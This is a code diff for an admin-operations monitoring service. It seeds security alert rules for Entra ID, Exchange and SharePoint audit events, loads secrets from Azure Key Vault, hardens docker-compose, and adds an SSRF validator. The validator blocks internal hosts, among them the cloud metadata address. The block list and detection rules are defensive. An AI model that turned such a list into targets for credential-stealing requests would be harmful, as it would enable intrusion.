event=event,
)
except Exception as exc:
logger.warning("Failed to send notification", error=str(exc))
def seed_default_rules():
"""Upsert pre-built admin-ops rule templates. Safe for concurrent startup."""
# One-time cleanup: remove duplicates by name, keep the oldest (_id ascending)
pipeline = [
{"$sort": {"_id": ASCENDING}},
{"$group": {"_id": "$name", "first_id": {"$first": "$_id"}}},
]
seen = {doc["_id"]: doc["first_id"] for doc in rules_collection.aggregate(pipeline)}
for name, keep_id in seen.items():
rules_collection.delete_many({"name": name, "_id": {"$ne": keep_id}})
defaults = [
{
"name": "Failed Conditional Access",
"enabled": True,
"severity": "high",
"message": (
"A Conditional Access policy evaluation failed. "
"This may indicate a sign-in risk or policy misconfiguration."
),
"conditions": [
{"field": "service", "op": "eq", "value": "Directory"},
{"field": "operation", "op": "contains", "value": "ConditionalAccess"},
{"field": "result", "op": "neq", "value": "success"},
],
},
{
"name": "After-Hours Admin Activity",
"enabled": True,
"severity": "medium",
"message": "A privileged operation was performed outside business hours (9 AM 5 PM).",
"conditions": [
{
"field": "service",
"op": "in",
"value": ["Directory", "UserManagement", "GroupManagement", "RoleManagement"],
},
{"field": "timestamp", "op": "after_hours"},
],
},
{
"name": "New Application Registration",
"enabled": True,
"severity": "medium",
"message": (
"A new application was registered in Entra ID. Review for shadow IT or unauthorized integrations."
),
"conditions": [
{"field": "service", "op": "eq", "value": "ApplicationManagement"},
{"field": "operation", "op": "contains", "value": "Add application"},
],
},
{
"name": "Admin Role Assignment",
"enabled": True,
"severity": "high",
"message": "A user was assigned an administrative role. Verify this was expected and authorized.",
"conditions": [
{"field": "service", "op": "eq", "value": "RoleManagement"},
{"field": "operation", "op": "contains", "value": "Add member to role"},
],
},
{
"name": "License Change",
"enabled": True,
"severity": "low",
"message": "A license was assigned or removed from a user. Monitor for unexpected cost changes.",
"conditions": [
{"field": "service", "op": "eq", "value": "License"},
],
},
{
"name": "Bulk User Deletion",
"enabled": True,
"severity": "high",
"message": (
"Multiple users were deleted in a short window. "
"This may indicate a compromised admin account or cleanup activity."
),
"conditions": [
{"field": "service", "op": "in", "value": ["Directory", "UserManagement"]},
{"field": "operation", "op": "contains", "value": "Delete user"},
],
},
{
"name": "Device Compliance Failure",
"enabled": True,
"severity": "medium",
"message": (
"A device failed compliance evaluation. "
"It may no longer meet your organization's security requirements."
),
"conditions": [
{"field": "service", "op": "eq", "value": "Intune"},
{"field": "operation", "op": "contains", "value": "compliance"},
{"field": "result", "op": "neq", "value": "success"},
],
},
{
"name": "Exchange Transport Rule Change",
"enabled": True,
"severity": "high",
"message": "An Exchange transport rule was modified. This could affect mail flow or security filtering.",
"conditions": [
{"field": "service", "op": "eq", "value": "Exchange"},
{"field": "operation", "op": "contains", "value": "Transport rule"},
],
},
{
"name": "Service Principal Credential Added",
"enabled": True,
"severity": "high",
"message": "A new secret or certificate was added to a service principal. Verify this was expected.",
"conditions": [
{"field": "service", "op": "eq", "value": "ApplicationManagement"},
{"field": "operation", "op": "contains", "value": "Add service principal credentials"},
],
},
{
"name": "External Sharing Enabled",
"enabled": True,
"severity": "medium",
"message": (
"External sharing settings were modified on a SharePoint site or team. Review for data exposure risk."
),
"conditions": [
{"field": "service", "op": "in", "value": ["SharePoint", "Teams"]},
{"field": "operation", "op": "contains", "value": "Sharing"},
],
},
]
inserted = 0
for rule in defaults:
try:
result = rules_collection.replace_one(
{"name": rule["name"]},
rule,
upsert=True,
)
if result.upserted_id:
inserted += 1
except Exception as exc:
logger.warning("Failed to seed rule", rule=rule["name"], error=str(exc))
if inserted:
logger.info("Default admin-ops rules seeded", inserted=inserted, total=len(defaults))

View File

@@ -0,0 +1,76 @@
"""Optional Azure Key Vault integration for secrets storage.
If AZURE_KEY_VAULT_NAME is configured, sensitive secrets are fetched from
Azure Key Vault at startup and injected into the environment so that
pydantic-settings can read them. Falls back to .env / environment variables
when Key Vault is not configured.
Secret naming convention in Key Vault:
aoc-client-secret → CLIENT_SECRET
aoc-llm-api-key → LLM_API_KEY
aoc-mongo-uri → MONGO_URI
aoc-webhook-client-secret → WEBHOOK_CLIENT_SECRET
"""
import os
import structlog
logger = structlog.get_logger("aoc.secrets")
_KEY_VAULT_SECRET_MAP = {
"aoc-client-secret": "CLIENT_SECRET",
"aoc-llm-api-key": "LLM_API_KEY",
"aoc-mongo-uri": "MONGO_URI",
"aoc-webhook-client-secret": "WEBHOOK_CLIENT_SECRET",
}
def _load_from_key_vault(vault_name: str) -> dict[str, str]:
"""Fetch secrets from Azure Key Vault and return as {env_name: value}."""
try:
from azure.identity import DefaultAzureCredential
from azure.keyvault.secrets import SecretClient
except ImportError as exc:
raise RuntimeError(
"Azure Key Vault libraries are not installed. Run: pip install azure-identity azure-keyvault-secrets"
) from exc
vault_url = f"https://{vault_name}.vault.azure.net/"
credential = DefaultAzureCredential()
client = SecretClient(vault_url=vault_url, credential=credential)
loaded = {}
for kv_name, env_name in _KEY_VAULT_SECRET_MAP.items():
try:
secret = client.get_secret(kv_name)
if secret.value:
loaded[env_name] = secret.value
logger.info("Loaded secret from Key Vault", secret_name=kv_name)
except Exception as exc:
logger.warning(
"Failed to load secret from Key Vault",
secret_name=kv_name,
error=str(exc),
)
return loaded
def load_key_vault_secrets(vault_name: str | None = None):
"""Load secrets from Azure Key Vault into os.environ if configured.
This should be called BEFORE pydantic-settings parses configuration.
"""
vault = vault_name or os.environ.get("AZURE_KEY_VAULT_NAME", "")
if not vault:
return
logger.info("Loading secrets from Azure Key Vault", vault_name=vault)
secrets = _load_from_key_vault(vault)
for env_name, value in secrets.items():
os.environ[env_name] = value
logger.info(
"Key Vault secrets loaded",
count=len(secrets),
keys=list(secrets.keys()),
)

View File

@@ -1,15 +1,43 @@
import ipaddress
import requests
import structlog
from config import SIEM_ENABLED, SIEM_WEBHOOK_URL
from config import SIEM_ALLOWED_DOMAINS, SIEM_ENABLED, SIEM_WEBHOOK_URL
logger = structlog.get_logger("aoc.siem")
def _validate_siem_url(url: str):
"""Prevent SSRF by rejecting internal/reserved addresses and enforcing domain allowlist."""
from urllib.parse import urlparse
parsed = urlparse(url)
if parsed.scheme != "https":
raise RuntimeError("SIEM_WEBHOOK_URL must use HTTPS")
hostname = (parsed.hostname or "").lower()
if not hostname:
raise RuntimeError("SIEM_WEBHOOK_URL must have a valid hostname")
blocked = {"localhost", "127.0.0.1", "0.0.0.0", "::1", "169.254.169.254"}
if hostname in blocked:
raise RuntimeError(f"SIEM_WEBHOOK_URL hostname '{hostname}' is not allowed")
try:
ip = ipaddress.ip_address(hostname)
if ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved:
raise RuntimeError(f"SIEM_WEBHOOK_URL IP '{hostname}' is not allowed")
except ValueError:
pass
if SIEM_ALLOWED_DOMAINS:
allowed = any(hostname == d or (d.startswith("*.") and hostname.endswith(d[1:])) for d in SIEM_ALLOWED_DOMAINS)
if not allowed:
raise RuntimeError(f"SIEM_WEBHOOK_URL domain '{hostname}' is not in SIEM_ALLOWED_DOMAINS")
def forward_event(event: dict):
"""Forward a normalized event to the configured SIEM webhook."""
if not SIEM_ENABLED or not SIEM_WEBHOOK_URL:
return
try:
_validate_siem_url(SIEM_WEBHOOK_URL)
res = requests.post(SIEM_WEBHOOK_URL, json=event, timeout=10)
res.raise_for_status()
logger.debug("Event forwarded to SIEM", event_id=event.get("id"))

View File

@@ -51,17 +51,32 @@ def client(mock_events_collection, mock_watermarks_collection, monkeypatch):
# Mock Redis so tests don't require a running Redis server
class FakeRedis:
_store = {}
async def get(self, key):
return None
return self._store.get(key)
async def setex(self, key, ttl, value):
self._store[key] = value
async def incr(self, key):
self._store[key] = self._store.get(key, 0) + 1
return self._store[key]
async def expire(self, key, ttl):
pass
async def fake_get_arq_pool():
return FakeRedis()
async def fake_get_redis():
return FakeRedis()
monkeypatch.setattr("redis_client.get_arq_pool", fake_get_arq_pool)
monkeypatch.setattr("redis_client.get_redis", fake_get_redis)
monkeypatch.setattr("routes.ask.get_arq_pool", fake_get_arq_pool)
monkeypatch.setattr("routes.jobs.get_redis", fake_get_arq_pool)
monkeypatch.setattr("routes.jobs.get_redis", fake_get_redis)
monkeypatch.setattr("rate_limiter.get_redis", fake_get_redis)
from main import app

View File

@@ -92,6 +92,7 @@ def test_explain_event_with_llm_mock(client, mock_events_collection, monkeypatch
class FakeRedis:
async def get(self, key):
return None
async def setex(self, key, ttl, value):
pass
@@ -267,7 +268,7 @@ def test_health(client):
def test_metrics(client):
response = client.get("/metrics")
response = client.get("/metrics", headers={"X-Forwarded-For": "127.0.0.1"})
assert response.status_code == 200
assert "aoc_request_duration_seconds" in response.text

View File

@@ -1,5 +1,7 @@
import asyncio
from datetime import UTC, datetime, timedelta
from jobs import set_cached_ask
from routes.ask import _build_event_query, _extract_entity, _extract_time_range
# ---------------------------------------------------------------------------
@@ -393,8 +395,6 @@ class TestAskCaching:
redis = CachingFakeRedis()
# Seed cache with the exact filters the endpoint will generate
import asyncio
from jobs import set_cached_ask
filters_snapshot = {
"services": None,
"actor": None,
@@ -405,7 +405,15 @@ class TestAskCaching:
"include_tags": None,
"exclude_tags": None,
}
asyncio.run(set_cached_ask(redis, "What happened to USER-001?", filters_snapshot, [{"id": "evt-cache"}], {"answer": "Cached answer!", "llm_used": True, "llm_error": None}))
asyncio.run(
set_cached_ask(
redis,
"What happened to USER-001?",
filters_snapshot,
[{"id": "evt-cache"}],
{"answer": "Cached answer!", "llm_used": True, "llm_error": None},
)
)
async def fake_get_arq_pool():
return redis
@@ -451,6 +459,7 @@ class TestAskCaching:
async def enqueue_job(self, func, *args, **kwargs):
from unittest.mock import MagicMock
job = MagicMock()
job.job_id = "job-12345"
self.enqueued.append((func, args, kwargs))

View File

@@ -59,6 +59,7 @@ def test_evaluate_event_creates_alert(monkeypatch):
inserted["doc"] = doc
monkeypatch.setattr(alerts_collection, "insert_one", mock_insert)
monkeypatch.setattr(alerts_collection, "count_documents", lambda *args, **kwargs: 0)
event = {"id": "e1", "operation": "Add user", "timestamp": datetime.now(UTC).isoformat(), "dedupe_key": "dk1"}
triggered = evaluate_event(event)

View File

@@ -3,8 +3,7 @@ services:
image: valkey/valkey:8-alpine
container_name: aoc-redis
restart: always
ports:
- "6379:6379"
# Ports not exposed to host; backend and worker connect via Docker network
volumes:
- redis_data:/data
@@ -12,8 +11,7 @@ services:
image: mongo:7
container_name: aoc-mongo
restart: always
ports:
- "27017:27017"
# Ports not exposed to host; backend and worker connect via Docker network
environment:
MONGO_INITDB_ROOT_USERNAME: ${MONGO_ROOT_USERNAME}
MONGO_INITDB_ROOT_PASSWORD: ${MONGO_ROOT_PASSWORD}